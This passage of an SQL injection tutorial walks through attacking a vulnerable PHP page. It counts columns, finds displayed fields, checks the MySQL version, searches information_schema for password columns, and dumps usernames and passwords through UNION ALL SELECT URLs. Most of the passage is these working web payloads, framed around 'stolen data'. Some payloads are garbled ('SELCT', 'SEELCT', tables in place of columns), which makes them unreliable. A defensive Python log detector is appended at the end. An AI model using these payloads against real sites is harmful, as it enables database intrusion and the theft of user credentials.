(null is a data type that means empty. If you used 1 or 'the' - or in other words, an integer or string, you might get a type mismatch error)

If you get an error like "MySQL Error: Select statements must have the same number of columns in script.php on line 7." then you move on to

http://site.com/script.php?id=1' UNION ALL SELECT null,null --

and continue adding a ,null (an extra column) to the URL until you get no error. Then count the nulls and that's the number of columns!

2) use order by - this is WAY easier.

ORDER BY is a statement in SQL that tells the database server how to order the result. For example, if you did

SELECT title,data FROM news WHERE id=1 ORDER BY title ASC

the server would order all the output in alphabetical order from a-z. If you changed ASC to DESC it would make it z-a.

The server automatically sees if the column is a string or integer. If it's a string, it goes alphabetically, and if it's an integer, numerically.

ORDER BY also accepts numbers instead of column names. The number is the number of the column in the select statement. For example, if the query was this:

SELECT title,data FROM news WHERE id=1 ORDER BY 1 ASC

It would choose the first column chosen in the query, which is title (it chooses from title, data). Then it orders the result alphabetically from a-z.

If it was
SELECT title,data FROM news WHERE id=1 ORDER BY 2 ASC

It would use the second column selected, data, and order it by that.

So we can take advantage of this and try numbers from 1 on in the URL. Once we hit an error saying that the column is invalid, we know that the last number to NOT give an error is the number of columns. Here's an example:

http://site.com/script.php?id=1' ORDER BY 1 -- no error

http://site.com/script.php?id=1' ORDER BY 2 -- no error

http://site.com/script.php?id=1' ORDER BY 3 -- no error

http://site.com/script.php?id=1' ORDER BY 4 -- error - "MySQL Error: No column number '4' in WHERE clause in script.php on line 7."

So we know that 3, the last number to not give an error, is the number of columns in the first select!

Now let's move on to the next step!


Subsection 2.6 - Step 5) Craft a union statement that doesn't cause an error & see which columns are outputted

So now that we know the number of columns, we need to make a union statement and see which columns are outputted to the site so we know which columns we can use to retrieve and output our data to the screen. This is generally a two-step process.

1) First we craft the union select statement (remember to use union all) with numbers as the columns. An example:


http://site.com/script.php?id=1' UNION ALL SELECT 1,2,3 --

If there is no error, you look at the screen and check which numbers are displayed in the place data would normally be put (for example, in the place where the article title would be, check if a number is there).

If the numbers are on the screen, you know you can use the columns with those numbers to display stolen data. The other columns that aren't displayed are useless.

For example, if you see the number 2 in the title of the page and a number 3 where the article is usually displayed, you know that you can use the second and third column (where you put the 2 and 3 in the union all select 1,2,3 --) to display data you will steal from the database to the page.

Now if you get an error when you use all numbers like: "MySQL Error: Cant convert int in script.php on line 7." then you know that one column can't be a number, so you should move to step 2.

2) Since we know that we can't go all out and put all integers, we need to use null. Null never causes a type conversion error since it's just an empty data holder. So we try:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

Now if you get an error, there is a good chance the script has TWO select statements. For example, first it can do

SELECT title,data,author FROM news WHERE id= '[your data from the url]'

then in a later line in the script it uses the id value from the url again in another select statement like this:

SELECT date,time FROM news WHERE id= '[your data from the url]'

Now, the first select statement would be like this:

SELECT title,data,author FROM news WHERE id= '1' UNION ALL SELECT null,null,null --

but the second will be

SELECT date,time FROM news WHERE id = '1' UNION ALL SELECT null,null,null --

This would cause an error since the second query has ONLY TWO columns in the first select statement (date,time), while the union all select has THREE columns. This will cause another error saying select statements need the same number of columns. Now if you change the UNION ALL SELECT to have two nulls, then the first select would cause an error.


Unfortunately, there is no way around this in MySQL at the moment (in MSSQL there is, however). A good way to double check that it's a multi select and not that you messed up the number of columns in the UNION select statement is to cause an error like we did before, doing

http://site.com/script.php?id=1'

Say you got an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then do the union all select url like this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

say you get an error like this:

"MySQL Error: Select statements must have the same number of columns in script.php on line 18."

Now look at the two errors. The first is on line 7, and the second on line 18. Now that you know that two separate lines of code caused the error, you know that two separate queries caused the error and it is in fact a multi select, which you can't get around.

Keep in mind that not all sites have errors that verbose. Some just say "error". Then you would have to double check the columns and make sure you didn't make a mistake.

So let's say there is no multi select. We left off at:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

Now there is no error. So we try this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,null,null --

We check for two things: an error, and if no error is displayed, check if the number 1 is displayed on the page in a place it wasn't before, like the title or where the news or author would be.

Say you get the same error as before in step 1:

"MySQL Error: Cant convert int in script.php on line 7."

Then you know that the first column causes an error, and you should ignore it and switch it back to null.

If it happens that all the columns cause errors or aren't displayed on the page, you can come back and test it with 'test' instead of 1 and see if it displays text or still gives a conversion error. If you get no error AND the word test is displayed on the page, you can then go further and get usernames/passwords and any other text based data, but not data that are integers like dates and ***s.


So now that we know 1 causes an error, we move on and check column two after we switch 1 back to null.

http://site.com/script.php?id=1' UNION ALL SELECT null,2,null --

Now look at the screen. Let's say there is an error. So now we know that 2 also causes an error and can't be used.

So let's change 2 back to null and try 3.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --

and guess what - no error! Now check the page for the number 3. Check any places such as the title bar in your browser and places where data was, like where the news was or the author or date. If you don't find anything, don't give up, make the number unique like 1232323132 and view the source and see if it's displayed in any hidden tags.

If it's not displayed, as I said before, you can go back to the other two and try strings like 'test' (as long as magic quotes are disabled, or you're getting around them like I will explain later), and check if those are displayed.

So now we are left with:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --

and we know we can use the 3rd column to display our stolen data! So let's move on to step 6:


Subsection 2.7 - Step 6) Check the mysql version to see if information_schema is present

This is an easy step!
Information_Schema is a part of the database that holds ALL of the table names and column names stored in that database. You can access it like any other table.

To get tables, you would use information_schema.tables like this:

select table_name from information_schema.tables

This would return all of the tables that exist in the database.

To get columns you would use information_schema.columns

select column_name from information_schema.columns

This would return all the column names in all the tables of the database.

Information_schema.columns also holds the table names, so you can switch column_name with table_name and use it to get tables too.

Now this luxury is only available in MySQL version 5 and up (6). So to make sure we can use it, we need to use the @@version command to check the version. So let's take our URL and replace 3 with @@version.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,@@version --

Now, check where the 3 was before to see the version.

If the version is like 4.0.22-log, then the MySQL version is 4 and you can't use information_schema.tables, but if it's 5.0.1, then you can use information_schema.tables! You can also use the substring method I described before.

Now let's move on to step 7:

Subsection 2.8 - Step 7) Retrieve the desired columns

If the version is above or equal to 5, we can scan information_schema for password (or ***, etc) columns. If not, we have to guess and use clues given to us in errors to find prefixes, tables and columns that we want to steal data from. So for the first part let's assume that information_schema is enabled.

Now we need to scan information_schema for columns that are similar to pass, password, user_pass, etc. (you can change it around so it will be ***, address, phone number, etc)

So, we need to use information_schema.columns and the LIKE operator along with wildcards (%) as I discussed in the basic info section.

So if we were putting queries straight into the db server, it would look like this:

SELECT column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'

(of course, magic quotes will have to be off. If they're on, you will learn how to get past them later on)

For our vulnerable site, it would look like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' –

The LIKE '%pass%' is telling the server to make sure column_name has a value that is similar to "pass" and can have text before and after it (the wildcards). So it could be pass, userpass, password, etc.

This will return the first column_name that is like pass, with text before and after it (from the wildcards before and after it).

Now say you want the table_name the column is in so you can access it with union. You would simply change column_name to table_name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' --

Now say you don't like this first column/table, and you want to see if there's a second. There are two ways we can do this. The first is with limit (which I explained in the basic info section). So you would add limit 0,1 at the end, which says get 1 result starting from the 0th (first for humans, 0 for computers) result.

Then after you get the column/table, to move on you would do limit 1,1 then limit 2,1 etc until it runs out of columns. Here's an example:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --

then record the column and the table it's in. Let's say the column is userpass and the table is members. Then we'd change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1

then record the info again. Then we change it to:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --

etc, until you run out of columns that are like pass.

Now say you didn't want to use limit. You could also use NOT IN(). For example, say you did

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%'


and you got the column user_password and table members. Now you wanted to see if there was an admins table with a column like pass. So you would add to the end

AND column_name NOT IN ('value'). This says choose the first row where the column "column_name" doesn't have this value. So if you wanted to get the next user column, you would do

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND column_name NOT IN ('user_password') --

or to be more safe, in case the admins table also has the column user_password, you could make it check for the table name like:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password') --

Then say you got the column password and table backup_members. This is only a backup table, so you want to keep on going until you get the admins table. then you would take the url from before and add a ,'backup_members' to the NOT IN ('user_password') like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

and then you would check the table name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE table_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --

You would continue adding ,'table_name' until you finally got to the admins table (if there is one!)

Keep in mind magic quotes must be off for this. Again, you will find out how to bypass magic quotes in times like this later.

Now let's say the MySQL version was only 4 and information_schema IS NOT present. So we would have to use another method to try to get the tables/columns of our interest. Basically, you would first look in the errors and see if it discloses the whole query or at least the table and column (e.g. Mysql Error in 'userpass FROM users where id=1''), and then resort to good old guessing. These two steps mainly revolve around luck and poor error message configuration.

So let me explain the error method first. Let's say you do this:

http://site.com/script.php?id=1'


and get the error:

MySQL Syntax Error in the query 'SELECT name FROM sb_news WHERE id = 1''

In the above example, the tables have a prefix (sb). Prefixes are usually present in each table if they're in one and are very common in sites. Now that you know the prefix, you would guess sb_users, sb_members, sb_admins, sb_accounts, etc. You see that the column has no prefix, so after you get the table you would try username, password, user_password, user_pass, login, etc... If the error was

MySQL Syntax Error in the query 'SELECT name FROM news WHERE id = 1''

Then you would know the columns have no prefix and you wouldn't have to guess with the prefix. However, errors like this are very uncommon. A more common error would be:

Mysql Error: Syntax error by '1' AND g_embedable=1 LIMIT 1' at line 1

This would show you the column name in the particular table. This would be useful because you can now assume either all the columns in the database have the g_ prefix, or you could somehow figure out why it has the prefix (for example, if it was a page of games, you could guess that g stood for games), then see how you can modify it for the users table (so if the table was users, it could be u_password, u_pass, u_username, u_user, u_login, etc). Of course, you would have to straight out guess the tables and if they had prefixes.

But once you have this info, how exactly do you check if the table/column exists? You would use a union all select that selected null (nothing) from the table you're guessing. For example:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null FROM table (remember to use the right number of columns)

Now if you get an error saying Mysql Error: Table 'table' Not found in script.php on line 7 or any error similar, you know the table doesn't exist.

Once you have guessed the table correctly, then you would have to guess the column. You would do this by changing a null to the column name you're guessing and seeing if there was an error. For example:

http://site.com/script.php?id=1' UNION ALL SELCT null,null,password from users

If there is no error and the page loads, then you know the column is password. If there is an error saying invalid column, you have to keep guessing. Remember to use a column that does NOT cause a conversion error since the error may be misleading.

Now that you have the column and table you want to steal data from, we'll move on to the next step!



Subsection 2.9 - Step 8) Get your data

This is the final part of this tutorial, and easy as hell!

So we have our table and column. Let's say the table is users and the two columns you got are username and password. So all we have to do to get the data from those columns is use a simple select query in our URL and limit to sift through the rows! So with username and password in table users, we would do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,username FROM users --

Then check the page where the data is displayed and you'll see the username!

Now for the password:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --

Then check the page where the username was and you’ll see the password! Now, instead of doing two separate queries for the username and password, there are two ways to get the data out at the same time.

The first is if two columns display data to the page. Say columns 2 and 3 displayed data in our UNION ALL SELECT null,null,null. So we would do

http://site.com/script.php?id=1' UNION ALL SELECT null,username,password FROM users --

Then you can look on the page for the username AND password. But they are on different parts of the page, aren't they? To get them together, we can use the function concat(). Concat joins strings. The syntax is concat(string1,string2,etc). You can put in as many strings as you want separated by commas. You can either use column_names or actual strings enclosed by 's (magic quotes must be off). The benefit is the data is together and we only need one column that outputs.

So we can do this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,password) FROM users --

But then there would be no distinction between the username and password. So we should add a --- between them. So we could do concat(username,'---',password). Again, magic quotes MUST be off for this to work. An example would be:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) --

Then you will see the username and password separated by ---'s on the page!

Now, what if you didn't want the first user's password? Then you would use limit as I discussed earlier. You would tell limit to start from the 2nd row (which is actually 1 for computers since 0 is the first) and to choose 1 row (limit 1,1). So you would do

http://site.com/script.php?id=1’ UNION ALL SEELCT null,null,concat(username, ‘---‘, password) limit 1,1 –

Then you would check the page again and in the place you saw the previous username and password you would see the second user's in the same exact format. Now if you wanted the next user, you would change limit 1,1 to limit 2,1, then the next would be limit 3,1, etc etc until you have all the users you want!
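The steps above leave a recognisable trail in a web server's access log: ORDER BY counting, UNION ALL SELECT padding, @@version and information_schema lookups, then LIMIT n,1 walking. The following is an added example (not part of the original tutorial) that groups those stages per client; the log format, the rule names and every log line are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines: client, request line, status. 203.0.113.7 replays
# the tutorial's steps; 198.51.100.4 is ordinary traffic with look-alike words.
SAMPLE_LOG = """\
198.51.100.4 "GET /script.php?id=2 HTTP/1.1" 200
198.51.100.4 "GET /search.php?q=order+by+phone HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20ORDER%20BY%201%20--%20 HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20ORDER%20BY%202%20--%20 HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20ORDER%20BY%203%20--%20 HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20ORDER%20BY%204%20--%20 HTTP/1.1" 500
203.0.113.7 "GET /script.php?id=1%27%20UNION%20ALL%20SELECT%20null,null,null%20--%20 HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20UNION%20ALL%20SELECT%20null,null,@@version%20--%20 HTTP/1.1" 200
203.0.113.7 "GET /script.php?id=1%27%20UNION%20ALL%20SELECT%201,2,table_name%20FROM%20information_schema.tables%20limit%200,1%20--%20 HTTP/1.1" 200
198.51.100.4 "GET /search.php?q=student+union+select+committee HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')

RULES = [  # stage name -> pattern over the decoded, lower-cased query string
    ("order_by_count", re.compile(r"\border\s+by\s+(\d+)\b")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version_probe", re.compile(r"@@version\b")),
    ("schema_probe", re.compile(r"\binformation_schema\b")),
    ("limit_walk", re.compile(r"\blimit\s+\d+\s*,\s*\d+\b")),
]

def classify(target):
    """Return {stage: match} for one request target (path plus query string)."""
    query = unquote_plus(urlsplit(target).query).lower()
    return {name: m for name, rx in RULES if (m := rx.search(query))}

def analyze(log_text, min_stages=2):
    """Group hits per client; report clients that progressed through several stages."""
    clients = defaultdict(lambda: {"stages": [], "order_by_ok": []})
    for line in log_text.splitlines():
        parsed = LINE_RE.match(line.strip())
        if not parsed:
            continue
        ip, target, status = parsed.group(1), parsed.group(2), int(parsed.group(3))
        for name, hit in classify(target).items():
            rec = clients[ip]
            if name not in rec["stages"]:
                rec["stages"].append(name)
            # An ORDER BY n that still returned 200 tells the client n columns exist.
            if name == "order_by_count" and status == 200:
                rec["order_by_ok"].append(int(hit.group(1)))
    report = {}
    for ip, rec in clients.items():
        if len(rec["stages"]) >= min_stages:
            report[ip] = {"stages": rec["stages"],
                          "columns_learned": max(rec["order_by_ok"], default=None)}
    return report

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(ip, finding)
```

Keyword matching is easy to evade with comments or alternate encodings, so use it for triage and incident scoping alongside bound parameters, which are the actual fix.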